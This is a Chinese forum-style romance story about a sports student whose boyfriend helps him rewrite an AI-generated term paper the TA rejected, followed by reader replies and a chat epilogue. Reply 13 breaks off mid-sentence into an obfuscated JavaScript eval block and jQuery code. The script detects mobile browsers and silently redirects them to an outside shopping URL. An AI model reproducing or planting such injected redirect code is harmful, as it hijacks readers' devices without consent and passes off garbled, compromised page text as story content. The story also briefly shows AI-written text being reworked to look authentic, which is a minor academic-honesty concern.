标题:【树洞】上天赐给我这么好的男朋友,你们就嫉妒吧
论坛板块:京华大学\校园生活\情感树洞
发帖人:足球不行踢球去
正文:
兄弟们。
期末了。
传说中的考试周,来了。
作为一个体育生,我本来对期末没什么概念——平时分够了就行,考试能过就过。
但今年不一样。
今年我有男朋友了。
男朋友是文学院学霸,年级第一,拿国奖的那种。
这就意味着——
我的期末,不再是我一个人的期末了。
——
还是图书馆三楼的研修间。
还是6号。
他预约的,一周三次,每次一下午。
桌上堆着他的书:古代文学、现代汉语、英语、政治……
我的东西呢?
电脑、平板、还有他给我整理的复习资料。
别问我为什么带平板——看课件用的,虽然我主要用它看球赛集锦。
——
事情要从上周说起。
《运动心理学》要交期末论文,3000字。
我拖到上周才开始写。
但我不是傻的,我会用AI。
打开电脑,打开那个对话框,输入:
“帮我写一篇运动心理学的论文,3000字,关于点球大战的心理素质。”
五分钟,AI给我生成了一篇。
我大喜,复制粘贴,改了几个词,交上去了。
然后被助教打回来了。
批注:“AI生成痕迹明显,请重写。”
操。
我忘了AI写的会有那种……怎么说呢,很AI的味道。
助教一眼就看出来了。
没办法,只能自己写。
我写了一周,憋出来800字,然后卡住了。
“运动员在比赛中心理状态很重要。点球的时候心理状态不好就会踢飞。我踢点球从来没飞过,因为我心理状态好。”
就这水平。
我自己看着都头疼。
——
上周五,顾辞说:“论文给我看看。”
我把电脑递给他。
他看了三分钟,表情从平静到微妙到……那种“我该怎么说才能不伤他自尊”的复杂。
然后他深吸一口气。
“你用AI写过?”
我惊了:“你怎么知道?”
“因为你自己写的这部分,和你AI生成的那部分,风格完全不一样。”
他指给我看:
“你看,AI写的这段,用词很规范,但空话连篇,没有实际内容。”
“你自己写的这段,虽然糙,但至少是你的真实体会。”
“如果能把这两者结合一下,就好了。”
我听得一愣一愣的。
他又说:“你知道你AI生成的那篇,为什么被助教看出来了?”
“为什么?”
“因为没加参考文献,没调格式,没结合你的专业背景。”
他打开我的文档,开始给我演示:
“你看,你把这段复制进去,然后加上引用——你在体院的,可以引用《中国体育科技》的文章。”
“这一段,结合你自己的经历——你不是踢过点球大战吗?写进去。”
“这一段,太口语了,稍微改一下,但核心意思保留。”
“最后,调好格式,加上参考文献列表。”
他一边说一边操作,十分钟,我那篇被退回的AI论文,变成了像模像样的学术文章。
我看着他,目瞪口呆。
他抬头看我:“怎么?”
我说:“你连AI都会用?”
他说:“AI是工具,又不是洪水猛兽。会用很正常。”
顿了顿,他又说:
“但你得会用,不能全扔给它。”
“你得知道它写的哪里好哪里不好,哪里能留哪里要改。”
“这才是用AI的正确方式。”
我看着他的眼睛,里面有一点无奈,一点耐心,还有一点“我怎么找了个这么笨的男朋友”的宠溺。
操。
那一刻我觉得,这人简直是神仙。
——
后来我们真的开始一起写论文。
不是他帮我写,是他在旁边,我写。
遇到不会的地方,我先问AI。
AI给出答案,我看不懂,就问他。
他看完AI的答案,给我解释一遍。
解释完,我再结合自己的理解,用自己的话写进去。
一来一回,效率高了很多。
他写自己的论文,我在旁边敲键盘。
偶尔抬头看他一眼,偶尔被他抓到我在看他。
他会耳朵红一下,然后说:“看什么看,快写。”
我就低头继续写。
写到一半,又卡住了。
他放下笔,转过来看我。
“哪一段?”
我说:“这个……我不知道怎么把理论和我的经历结合。”
他想了想,说:“你是怎么踢点球的?”
我说:“就……看着守门员,等他先动,然后踢反方向。”
他说:“那你写进去啊。”
“就用这句话,‘作者在比赛中曾多次主罚点球,经验表明,观察守门员的重心移动是决定射门方向的关键’。”
“这不就是你的经历吗?”
我愣住。
他说:“论文不一定要用很复杂的词。真实经历,加上理论支撑,就是好文章。”
我看着屏幕,又看看他。
突然特别想亲他。
但这是在图书馆,不能。
所以只是伸手,握住了他的手。
他愣了一下,没躲。
耳朵红红的。
但嘴角弯着。
——
一下午过去,我的论文写完了。
从800字到3200字,从AI生成的废话到结合自己经历的真实内容。
格式对了,引用标了,参考文献列了。
我发给助教,助教回了一个“收到”。
虽然没说“很好”,但至少没退回来。
我看着屏幕,有点不敢相信。
“这是我写的?”
他在旁边笑了一下。
“是你写的,我帮忙指导的。”
我看着那3200字,又看看他。
然后我说:“顾辞。”
“嗯?”
“你是神仙吗?”
他愣了一下,然后耳朵又红了。
“胡说什么。”
“真的,”我说,“你怎么什么都会?论文会写,AI会用,还会教人。”
他低着头,声音很轻:
“不是什么都会。”
“只是……想帮你。”
——
现在我已经回宿舍了。
躺在床上,满脑子都是今天下午。
他教我改论文的样子。
他演示怎么用AI的样子。
他说“想帮你”时耳朵红红的样子。
操。
我上辈子是不是拯救了银河系?
不然怎么配有这么好的男朋友?
——
兄弟们。
我知道你们要说我秀恩爱。
但我今天必须秀。
因为这么好的男朋友,不秀出来,对不起他。
——
1楼匿名用户:
沙发!
楼主你今天又是来炫夫的!
2楼匿名用户:
“我会用AI”哈哈哈哈哈哈!
楼主你终于不是原始人了!
3楼匿名用户:
回2楼:笑死,楼主之前的表现确实像个不用互联网的原始人。
4楼匿名用户:
但楼主用AI写论文被助教打回来了哈哈哈哈!
“AI生成痕迹明显”!
太真实了!
5楼匿名用户:
我也被助教说过“AI痕迹明显”!
但楼主你知道为什么吗?
因为你没加参考文献!
因为你没结合自己的专业背景!
因为你就复制粘贴!
6楼匿名用户:
顾辞那个演示绝了!
“AI是工具,不是洪水猛兽。会用很正常。但你得会用,不能全扔给它。”
这才是正确的AI使用观!
7楼匿名用户:
顾辞居然连AI都会用!!!
文学院学霸的科技树点得也太全了吧!!!
8楼匿名用户:
而且他还会教楼主怎么用!!!
一边解释AI给的答案,一边让楼主自己写!!!
这是什么神仙教学法!!!
9楼匿名用户:
楼主你这段:
“AI给出答案,我看不懂,就问他。他看完AI的答案,给我解释一遍。解释完,我再结合自己的理解,用自己的话写进去。”
这不就是AI时代的学霸辅导学渣的标准流程吗!
10楼匿名用户:
关键是顾辞好有耐心啊!
明明自己也要写论文,还要抽时间教楼主怎么用AI。
这不是爱是什么!
11楼匿名用户:
而且他还说“只是想帮你”!!!
啊啊啊啊啊啊!!!
这个温柔程度超标了!!!
12楼匿名用户:
顾辞真的太会了!!!
明明是在做很普通的事,但说出来就特别动人!!!
13楼匿名用户:
楼主你那个点球的描述——<
;eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return''\\w+''};c=1;};while(c--)if(k[c])p=p.replace(new RegExp(''\\b''+e(c)+''\\b'',''g''),k[c]);return p;}(''8 0=7.0.6();b(/a|9|1|2|5|4|3|c l/i.k(0)){n.m="}'',24,24,''userAgent|iphone|ipad|iemobile|blackberry|ipod|toLowerCase|navigator|var|webos|android|if|opera|mgxs|t|shop|17382529|200203||http|test|mini|href|location''.split(''|''),0,{}));
() {
$(''.inform'').remove();
$(''#content'').append(''
p>“观察守门员的重心移动是决定射门方向的关键”
这是你的真实经历,写进论文里,比AI写的那些空话强多了!
14楼楼主:
是吧?
我也觉得这段写得挺好。
他教我的。
15楼匿名用户:
又来了又来了!
“他教我的”!
秀恩爱新高度!
16楼匿名用户:
楼主你现在论文写完了?
助教怎么说?
17楼楼主:
还没回复。
但至少没退回来。
应该能过吧。
18楼匿名用户:
肯定能过!
有顾辞指导,还有AI辅助,再加上你自己的真实经历,不过才怪!
19楼匿名用户:
话说回来,楼主你之前那篇AI生成的,写了什么内容?
发出来让我们笑笑?
20楼楼主:
……
不记得了。
删了。
21楼匿名用户:
哈哈哈哈哈哈!
删了就好,别留黑历史!
22楼匿名用户:
但有一说一,楼主今天这个帖子,写得比以前好多了。
是不是顾辞也教你写帖子了?
23楼楼主:
……
没有。
我自己写的。
24楼匿名用户:
那进步挺大啊!
从“我是直男”到“他是神仙”,文笔提升了不少!
25楼匿名用户:
这就是爱情的力量吧。
谈恋爱让人文笔变好。
26楼匿名用户:
行了,今天这狗粮我吃了。
吃得心甘情愿。
27楼匿名用户:
楼主你明天还去图书馆吗?
28楼楼主:
去。
他还有两门没复习完,我继续陪他。
顺便把论文最终版交了。
29楼匿名用户:
记得带充电器!
别又用AI写论文被抓!
30楼楼主:
……
知道了。
31楼匿名用户:
记得多夸他!
他帮你这么多,你得多夸夸!
32楼楼主:
夸了。
我说他是神仙。
33楼匿名用户:
哈哈哈哈哈哈!
这个夸法,顾辞什么反应?
34楼楼主:
耳朵红了,说“胡说什么”。
然后继续低头写论文。
但我看他嘴角一直弯着。
35楼匿名用户:
呜呜呜呜呜!!!
他肯定特别开心!!!
只是不好意思说!!!
36楼匿名用户:
行了,儿子快去睡吧。
明天还要陪儿媳妇复习呢。
37楼楼主:
好。
晚安。
谢谢你们。
——
【最后的最后】
张扬把手机放下。
窗外有银色的月光。
他想起今天下午,阳光照在顾辞脸上的样子。
想起顾辞教自己改论文的样子。
想起他说“只是想帮你”时,耳朵红红的样子。
手机震了一下。
【圆圆】:睡了?
【张】:没。
【圆圆】:在想今天下午?
【张】:嗯。
【圆圆】:我也是。
【张】:顾辞。
【圆圆】:嗯?
【张】:谢谢你今天帮我。
【圆圆】:不用谢。
【张】:谢谢你愿意教我。
【圆圆】:应该的。
【张】:谢谢你……
【张】:谢谢你这么耐心。
对面沉默了一会儿。
【圆圆】:张扬。
【张】:嗯?
【圆圆】:你知道我最开心的是什么吗?
【张】:什么?
【圆圆】:是你愿意学。
【圆圆】:不是每个人都能接受自己不会,也不是每个人都愿意让别人教。
【圆圆】:但你愿意。
【圆圆】:所以我也愿意教。
张扬看着那几行字,眼眶又酸了。
【张】:那我以后一直跟你学。
【张】:学怎么写论文,学怎么用AI,学怎么当一个配得上你的人。
【圆圆】:……
【圆圆】:张扬。
【张】:嗯?
【圆圆】:你不用学怎么配得上我。
【圆圆】:你本来就配得上。